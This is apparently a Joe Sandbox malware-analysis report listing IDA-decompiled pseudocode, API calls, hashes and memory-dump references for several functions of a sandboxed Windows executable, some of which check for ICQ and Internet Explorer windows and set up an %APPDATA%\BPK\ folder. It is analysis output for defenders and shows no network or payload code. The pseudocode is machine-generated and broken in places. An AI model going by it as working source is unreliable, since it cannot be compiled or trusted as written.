Opcode ID: 868783e6563bbb03d1187b08819161eaa4ce11f73b70fdfaad7a8b49b002303e
Instruction ID: 63433161b5d57ed2d1a44699c9fa668fd97e4b16314dc0aaa56a7f7113ed6bb4
Opcode Fuzzy Hash: 868783e6563bbb03d1187b08819161eaa4ce11f73b70fdfaad7a8b49b002303e
Instruction Fuzzy Hash: 392102719007049FEB20DF69C40279EBBE8AF48724F108A1FE066A72D1C7BC6A40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F971, Relevance: 12.0, APIs: 8, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041F971(void* __ecx, void* __edx, void* __eflags) {
				struct HWND__* _t16;
				int _t18;
				struct HWND__* _t20;
				void* _t33;
				void* _t36;

				E0043E4E0(0x441db8, _t36);
				_push(__ecx);
				_t33 = __ecx;
				L0043DDD8();
				_push(_t36 - 0x10);
				_push(0x42d);
				 *(_t36 - 4) = 0;
				L0043E2E2();
				E0041F818(__ecx, __edx);
				_t16 = GetParent( *(__ecx + 0x20));
				_push(_t16);
				L0043DD9C();
				_t20 = _t16;
				if(SendMessageA( *( *((intOrPtr*)(_t33 + 0x98)) + 0x20), 0x1004, 0, 0) == 0) {
					_push(1);
				} else {
					_push(3);
				}
				_t18 = PostMessageA( *(_t20 + 0x20), 0x470, 0, ??);
				 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t18;
			}

0x0041f976
0x0041f97b
0x0041f97e
0x0041f984
0x0041f98e
0x0041f98f
0x0041f996
0x0041f999
0x0041f9a0
0x0041f9a8
0x0041f9ae
0x0041f9af
0x0041f9c4
0x0041f9ce
0x0041f9d4
0x0041f9d0
0x0041f9d0
0x0041f9d0
0x0041f9df
0x0041f9e5
0x0041f9ec
0x0041f9f7
0x0041f9ff

APIs

__EH_prolog.LIBCMT ref: 0041F976
#540.MFC42 ref: 0041F984
#3097.MFC42(0000042D,?), ref: 0041F999

Part of subcall function 0041F818: __EH_prolog.LIBCMT ref: 0041F81D
Part of subcall function 0041F818: #540.MFC42(7741B980,?,?), ref: 0041F82D
Part of subcall function 0041F818: #540.MFC42(7741B980,?,?), ref: 0041F83A
Part of subcall function 0041F818: SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0041F853
Part of subcall function 0041F818: ImageList_GetImageCount.COMCTL32(?,?,?), ref: 0041F865
Part of subcall function 0041F818: ImageList_Remove.COMCTL32(?,-00000001,?,?), ref: 0041F878
Part of subcall function 0041F818: #3097.MFC42(0000042D,00000419,?,?), ref: 0041F89D
Part of subcall function 0041F818: LoadLibraryA.KERNEL32(?,0000042D,00000419,?,?), ref: 0041F8A5
Part of subcall function 0041F818: EnumResourceNamesA.KERNEL32 ref: 0041F8C4
Part of subcall function 0041F818: FreeLibrary.KERNEL32(00000000,?,?), ref: 0041F8CB
Part of subcall function 0041F818: ImageList_GetImageCount.COMCTL32(?,?,?), ref: 0041F8D9
Part of subcall function 0041F818: #2818.MFC42(0000041D,004532C8,00000001,?,?), ref: 0041F8EF
Part of subcall function 0041F818: #3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0041F909
Part of subcall function 0041F818: ImageList_GetImageCount.COMCTL32(?,00000003,00000000,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0041F917
Part of subcall function 0041F818: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0041F92F
Part of subcall function 0041F818: #6905.MFC42(00000000,00000003,00000003,?,?), ref: 0041F945
Part of subcall function 0041F818: #800.MFC42(?,?), ref: 0041F951

GetParent.USER32(?), ref: 0041F9A8
#2864.MFC42(00000000), ref: 0041F9AF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0041F9C6
PostMessageA.USER32 ref: 0041F9DF
#800.MFC42 ref: 0041F9EC

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Image$List_Message$#540CountSend$#3097#800H_prologLibrary$#2818#2864#3998#6905EnumFreeLoadNamesParentPostRemoveResource
String ID:
API String ID: 1156415693-0
Opcode ID: 94233a04f5f0b648b3eadf33a475dac80242bdc3abc789a497fe1dbb0b639aa4
Instruction ID: bc08f0fc931332a31c116db0e4c8aabe0b35e21f1e1e781493ea2e7c3cfa4b20
Opcode Fuzzy Hash: 94233a04f5f0b648b3eadf33a475dac80242bdc3abc789a497fe1dbb0b639aa4
Instruction Fuzzy Hash: 3101B1B1A10210BBDB21AB66DC4AFEF7779FFC9704F10052EB152A61E1DB781941C718

Uniqueness

Uniqueness Score: -1.00%

Function 0041A759, Relevance: 12.0, APIs: 8, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041A759(void* __ecx, void* __eflags) {
				int _t19;
				signed int _t20;
				void* _t37;

				E0043E4E0(0x4413f0, _t37);
				_push(_t20);
				L0043DDD8();
				 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
				_push(_t37 - 0x10);
				_push(0x432);
				L0043E2E2();
				_t19 = strcmp( *(_t37 - 0x10),  *(E00429029(_t37 - 0x14, 0xe025)));
				L0043DD36();
				if((_t20 & 0xffffff00 | _t19 == 0x00000000) != 0) {
					_push(0x4550cc);
					_push(0x432);
					L0043E066();
					L0043E15C();
				}
				 *(_t37 - 4) =  *(_t37 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
				return _t19;
			}

0x0041a75e
0x0041a765
0x0041a76d
0x0041a772
0x0041a77e
0x0041a77f
0x0041a782
0x0041a79a
0x0041a7aa
0x0041a7b1
0x0041a7b3
0x0041a7b8
0x0041a7bb
0x0041a7c2
0x0041a7c2
0x0041a7c7
0x0041a7ce
0x0041a7d9
0x0041a7e1

APIs

__EH_prolog.LIBCMT ref: 0041A75E
#540.MFC42 ref: 0041A76D
#3097.MFC42(00000432,?), ref: 0041A782

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

strcmp.MSVCRT ref: 0041A79A
#800.MFC42 ref: 0041A7AA
#3092.MFC42(00000432,004550CC), ref: 0041A7BB
#6199.MFC42(00000432,004550CC), ref: 0041A7C2
#800.MFC42 ref: 0041A7CE

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#1168#3092#3097#537#540#6199H_prologLoadStringstrcmp
String ID:
API String ID: 2713990731-0
Opcode ID: e4302706f348344c0111b934cf84e92528436f7596e7872fb68dae4db9b5a7eb
Instruction ID: 0f297a211d43a5c6c092c234e1f4e10b0e270f3ebb18d0f97577b6e52779b2a5
Opcode Fuzzy Hash: e4302706f348344c0111b934cf84e92528436f7596e7872fb68dae4db9b5a7eb
Instruction Fuzzy Hash: B2018471E12115ABDB14E7A6CD46AFEB379EF59314F40042FB022A31D1EF7C5E088628

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA17, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BA17(void* __ecx) {
				char _v8;
				void* __ebp;
				intOrPtr* _t58;
				intOrPtr _t59;
				signed int _t61;
				intOrPtr _t72;
				intOrPtr* _t75;
				intOrPtr _t80;
				intOrPtr* _t84;

				_push(__ecx);
				_t84 = __ecx;
				memset(__ecx, 0, 0x1070);
				 *((char*)(_t84 + 0x124)) = 1;
				 *((char*)(_t84 + 0x125)) = 1;
				 *((char*)(_t84 + 0x127)) = 1;
				 *((intOrPtr*)(_t84 + 0x67c)) = 1;
				_t72 = 0x1e;
				 *((char*)(_t84 + 0x141)) = 1;
				 *((intOrPtr*)(_t84 + 0x100)) = 0x19;
				 *(_t84 + 0x104) =  *(_t84 + 0x104) & 0x00000000;
				 *((intOrPtr*)(_t84 + 0x108)) = _t72;
				_t80 = 2;
				_t58 =  &_v8;
				 *((char*)(_t84 + 0x110)) = 1;
				 *_t84 = _t80;
				_push(_t58);
				 *((intOrPtr*)(_t84 + 0x114)) = 0x64c;
				L0043E162();
				_t59 =  *_t58;
				_t75 = _t84 + 0x118;
				 *_t75 = _t59;
				 *((intOrPtr*)(_t84 + 0x11c)) = _t59;
				 *((intOrPtr*)(_t84 + 0x120)) =  *_t75;
				 *(_t84 + 0x688) =  *(_t84 + 0x688) & 0x00000000;
				 *(_t84 + 0x13f) =  *(_t84 + 0x13f) & 0x00000000;
				 *((char*)(_t84 + 0x12d)) = 1;
				 *((intOrPtr*)(_t84 + 0x684)) = 5;
				 *((intOrPtr*)(_t84 + 0x690)) = 0x5a;
				 *((char*)(_t84 + 0x129)) = 1;
				 *((char*)(_t84 + 0x12e)) = 1;
				 *((char*)(_t84 + 0x139)) = 1;
				 *((char*)(_t84 + 0x131)) = 1;
				 *((char*)(_t84 + 0x133)) = 1;
				 *((char*)(_t84 + 0x142)) = 1;
				 *((intOrPtr*)(_t84 + 0x10c)) = 0x3e8;
				 *((char*)(_t84 + 0x135)) = 1;
				 *((char*)(_t84 + 0x140)) = 1;
				 *((char*)(_t84 + 0x148)) = 1;
				_t61 = E0040B985();
				 *(_t84 + 0x66c) =  *(_t84 + 0x66c) & 0x00000000;
				 *(_t84 + 0x754) =  *(_t84 + 0x754) & 0x00000000;
				 *((char*)(_t84 + 0x126)) = _t61 & 0xffffff00 | _t61 != 0x00000000;
				 *((intOrPtr*)(_t84 + 0x106c)) = 0x15;
				 *((intOrPtr*)(_t84 + 0x670)) = _t72;
				 *((char*)(_t84 + 0x361)) = 1;
				 *((char*)(_t84 + 0x362)) = 1;
				 *((char*)(_t84 + 0x363)) = 1;
				 *((char*)(_t84 + 0x364)) = 1;
				 *((intOrPtr*)(_t84 + 0x674)) = 0x3e8;
				 *((intOrPtr*)(_t84 + 0x358)) = _t80;
				 *((intOrPtr*)(_t84 + 0x35c)) = _t80;
				 *((intOrPtr*)(_t84 + 0x678)) = 3;
				 *((intOrPtr*)(_t84 + 0x68c)) = 1;
				lstrcpyA(_t84 + 0x768,  *(E00429029( &_v8, 0xe03d)));
				L0043DD36();
				 *((char*)(_t84 + 0x1068)) = 1;
				if(E00428AA6() != 0) {
					 *((char*)(_t84 + 0x14d)) = 1;
					lstrcpyA(_t84 + 0x150, "%APPDATA%\\BPK\\");
				}
				return _t84;
			}

0x0040ba1a
0x0040ba1e
0x0040ba28
0x0040ba30
0x0040ba37
0x0040ba3e
0x0040ba47
0x0040ba51
0x0040ba52
0x0040ba59
0x0040ba63
0x0040ba6c
0x0040ba72
0x0040ba73
0x0040ba76
0x0040ba7d
0x0040ba7f
0x0040ba80
0x0040ba8a
0x0040ba8f
0x0040ba91
0x0040ba97
0x0040ba99
0x0040baa1
0x0040baa7
0x0040baae
0x0040bab5
0x0040babc
0x0040bac6
0x0040bad0
0x0040bad7
0x0040bade
0x0040bae5
0x0040baec
0x0040baf3
0x0040bafa
0x0040bb04
0x0040bb0b
0x0040bb12
0x0040bb19
0x0040bb23
0x0040bb2a
0x0040bb31
0x0040bb40
0x0040bb4a
0x0040bb50
0x0040bb57
0x0040bb5e
0x0040bb65
0x0040bb6c
0x0040bb76
0x0040bb7c
0x0040bb82
0x0040bb8c
0x0040bbac
0x0040bbb1
0x0040bbb6
0x0040bbc4
0x0040bbd2
0x0040bbd9
0x0040bbd9
0x0040bbe1

APIs

memset.MSVCRT ref: 0040BA28
#3811.MFC42(?), ref: 0040BA8A

Part of subcall function 0040B985: __EH_prolog.LIBCMT ref: 0040B98A
Part of subcall function 0040B985: GetKeyboardLayoutList.USER32(00000014,?,00000002), ref: 0040B999
Part of subcall function 0040B985: GetKeyboardLayoutNameA.USER32 ref: 0040B9AD
Part of subcall function 0040B985: #537.MFC42(00000409), ref: 0040B9B7
Part of subcall function 0040B985: #5710.MFC42(?,00000004,00000409), ref: 0040B9C8
Part of subcall function 0040B985: strcmp.MSVCRT ref: 0040B9D4
Part of subcall function 0040B985: #800.MFC42(?,00000004,00000409), ref: 0040B9F0
Part of subcall function 0040B985: #800.MFC42(?,00000004,00000409), ref: 0040B9FC

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

lstrcpyA.KERNEL32(?,00000000), ref: 0040BBAC
#800.MFC42 ref: 0040BBB1

Part of subcall function 00428AA6: GetVersionExA.KERNEL32(?), ref: 00428AC0

lstrcpyA.KERNEL32(?,%APPDATA%\BPK\), ref: 0040BBD9

Strings

%APPDATA%\BPK\, xrefs: 0040BBCC

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537KeyboardLayoutlstrcpy$#1168#3811#5710H_prologListLoadNameStringVersionmemsetstrcmp
String ID: %APPDATA%\BPK\
API String ID: 2494417463-1467551811
Opcode ID: 2294109f747cae7c1b495328d78114a284539bb9e63ea87b08af0fac3d2435be
Instruction ID: 49241c115b9838168872868655aab705ec2d935350ae02bcf2efe0ba447b3199
Opcode Fuzzy Hash: 2294109f747cae7c1b495328d78114a284539bb9e63ea87b08af0fac3d2435be
Instruction Fuzzy Hash: 60410870508B849EE322CB39C4497C7BBE5AB6630CF04495DD4EE4A282D7FB3198CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0042987E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0042987E(char* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char* _t23;
				void* _t37;
				intOrPtr* _t43;
				char* _t45;
				CHAR* _t46;

				_t23 = strchr(_a4, 0x20);
				if(_t23 == 0) {
					L3:
					return 0;
				}
				_t45 = strchr( &(_t23[1]), 0x20);
				if(_t45 == 0) {
					goto L3;
				}
				_t43 = _a8;
				_t46 = _t45 + 1;
				lstrcpynA(_t43 + 4, _t46, 0x7ff);
				 *(_t46 - 1) =  *(_t46 - 1) & 0x00000000;
				if(sscanf(_a4, "%d/%d/%d %d:%d:%d",  &_v28,  &_v24,  &_v8,  &_v20,  &_v16,  &_v12) == 6) {
					_push(0xffffffff);
					_v8 = _v8 + 0x7d0;
					_push(_v12);
					_push(_v16);
					_push(_v20);
					_push(_v24);
					_push(_v28);
					_push(_v8);
					L0043E49E();
					 *_t43 = _v32;
					_t37 = 1;
					return _t37;
				}
				goto L3;
			}

0x00429891
0x00429897
0x004298ed
0x00000000
0x004298ed
0x0042989f
0x004298a5
0x00000000
0x00000000
0x004298a7
0x004298aa
0x004298b5
0x004298be
0x004298eb
0x004298f1
0x004298f3
0x004298fa
0x00429900
0x00429903
0x00429906
0x00429909
0x0042990c
0x0042990f
0x00429919
0x0042991b
0x00000000
0x0042991b
0x00000000

APIs

strchr.MSVCRT ref: 00429891
strchr.MSVCRT ref: 0042989D
lstrcpynA.KERNEL32(00000006,00000001,000007FF,?,?,0042A16F,?,?,?,?,00000001,00000000,0042A4E3), ref: 004298B5
sscanf.MSVCRT ref: 004298DF
#551.MFC42(000007D0,?,?,?,?,?,000000FF), ref: 0042990F

Strings

%d/%d/%d %d:%d:%d, xrefs: 004298D7

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: strchr$#551lstrcpynsscanf
String ID: %d/%d/%d %d:%d:%d
API String ID: 1469383783-1073349071
Opcode ID: 7c4c5cc3d185cd5d9044596d238cd3fa9dd5fba74d4af3212b5e25004957487a
Instruction ID: 629ab36ed323810976d1b48822148cef370bbc78154cb74c83e9d7926356c467
Opcode Fuzzy Hash: 7c4c5cc3d185cd5d9044596d238cd3fa9dd5fba74d4af3212b5e25004957487a
Instruction Fuzzy Hash: 3311677690021ABBDF11DBD4DC45EEFBBBCEF09320F140122F611E6191EA74AA15DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040B58E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040B58E(struct HWND__* _a4, char* _a8) {
				void _v263;
				char _v264;
				void* _t15;
				signed int _t27;
				void* _t38;
				void* _t39;
				intOrPtr* _t40;

				if(IsWindow(_a4) == 0 || strcmp(_a8, "__oxFrame.class__") != 0) {
					L6:
					return 0;
				} else {
					_t15 = E0040FF68(_a4, _t14, "__oxFrame.class__", _t14, "Internet Explorer_Server", _t14);
					_t39 = _t38 + 0x18;
					if(_t15 == 0) {
						goto L6;
					}
					_v264 = _v264 & 0x00000000;
					_t27 = 0x40;
					memset( &_v263, 0, _t27 << 2);
					_t40 = _t39 + 0xc;
					asm("stosw");
					asm("stosb");
					if(E00428947(_a4,  &_v264) == 0) {
						goto L6;
					}
					_strlwr( &_v264);
					 *_t40 = "icq.exe";
					if(strstr( &_v264, ??) == 0) {
						goto L6;
					}
					return 1;
				}
			}

0x0040b5a3
0x0040b62e
0x00000000
0x0040b5bd
0x0040b5c9
0x0040b5ce
0x0040b5d3
0x00000000
0x00000000
0x0040b5d5
0x0040b5e1
0x0040b5e8
0x0040b5e8
0x0040b5ea
0x0040b5ec
0x0040b601
0x00000000
0x00000000
0x0040b60a
0x0040b616
0x0040b628
0x00000000
0x00000000
0x00000000
0x0040b62a

APIs

IsWindow.USER32(?), ref: 0040B59B
strcmp.MSVCRT ref: 0040B5B2

Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90

Part of subcall function 00428947: IsWindow.USER32(00000000), ref: 0042896B

_strlwr.MSVCRT ref: 0040B60A
strstr.MSVCRT ref: 0040B61E

Strings

Internet Explorer_Server, xrefs: 0040B5BE
__oxFrame.class__, xrefs: 0040B5A9, 0040B5AE, 0040B5C4

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$Find$_strlwrstrcmpstrstr
String ID: Internet Explorer_Server$__oxFrame.class__
API String ID: 2833045664-2130105940
Opcode ID: 2faa1993934307063d6a46b96878a0ecfa6bc5ac05adf161643f02ad758a56d2
Instruction ID: fc1f0624b3fcf2580b2171affe93380737160daf20bdf4a1bd0fabe86463b360
Opcode Fuzzy Hash: 2faa1993934307063d6a46b96878a0ecfa6bc5ac05adf161643f02ad758a56d2
Instruction Fuzzy Hash: 7E11E9B65041197AEF105B21DC06BEB7BACDB01351F10447BF904E10D0EF7ADA89C69D

Uniqueness

Uniqueness Score: -1.00%

Function 004206E8, Relevance: 10.6, APIs: 7, Instructions: 61
stringCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E004206E8(void* __ecx) {
				char* _t8;
				char* _t9;
				char* _t13;
				char* _t27;
				char* _t28;
				void* _t30;

				_t30 = __ecx;
				_push(0);
				_push( *((intOrPtr*)(__ecx + 0x360)));
				L0043E462();
				while(1) {
					_t27 =  *(_t30 + 0x35c);
					_t8 = strstr(_t27, "\n\n");
					if(_t8 == 0) {
						goto L3;
					}
					_push(1);
					_push(_t8 - _t27);
					L0043E468();
				}
				while(1) {
					L3:
					_t28 =  *(_t30 + 0x35c);
					_t9 = strstr(_t28, "  ");
					if(_t9 == 0) {
						break;
					}
					_push(1);
					_push(_t9 - _t28);
					L0043E468();
				}
				_push(1);
				_push( *((intOrPtr*)(_t30 + 0x360)) - 1);
				L0043E468();
				_t13 =  *((intOrPtr*)(_t30 + 0x360)) - 1;
				if(_t13 >= 0) {
					_t13 =  *(_t30 + 0x35c);
					if( *_t13 == 0xa) {
						_push(1);
						_push(0);
						L0043E468();
						return _t13;
					}
				}
				return _t13;
			}

0x004206eb
0x004206ee
0x004206f0
0x004206fe
0x00420709
0x00420709
0x00420715
0x0042071b
0x00000000
0x00000000
0x0042071f
0x00420721
0x00420724
0x00420724
0x0042072b
0x0042072b
0x0042072b
0x00420737
0x0042073d
0x00000000
0x00000000
0x00420741
0x00420743
0x00420746
0x00420746
0x0042075a
0x0042075c
0x0042075f
0x00420766
0x00420767
0x00420769
0x00420772
0x00420774
0x00420776
0x0042077a
0x00000000
0x0042077a
0x00420772
0x00420783

APIs

#5857.MFC42(?,00000000,?,?,?,?,004201DB,?), ref: 004206FE
strstr.MSVCRT ref: 00420715
#5602.MFC42(00000000,00000001,?,?,004201DB,?), ref: 00420724
strstr.MSVCRT ref: 00420737
#5602.MFC42(00000000,00000001,004201DB,?), ref: 00420746
#5602.MFC42(?,00000001,004201DB,?), ref: 0042075F
#5602.MFC42(00000000,00000001,?,00000001,004201DB,?), ref: 0042077A

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
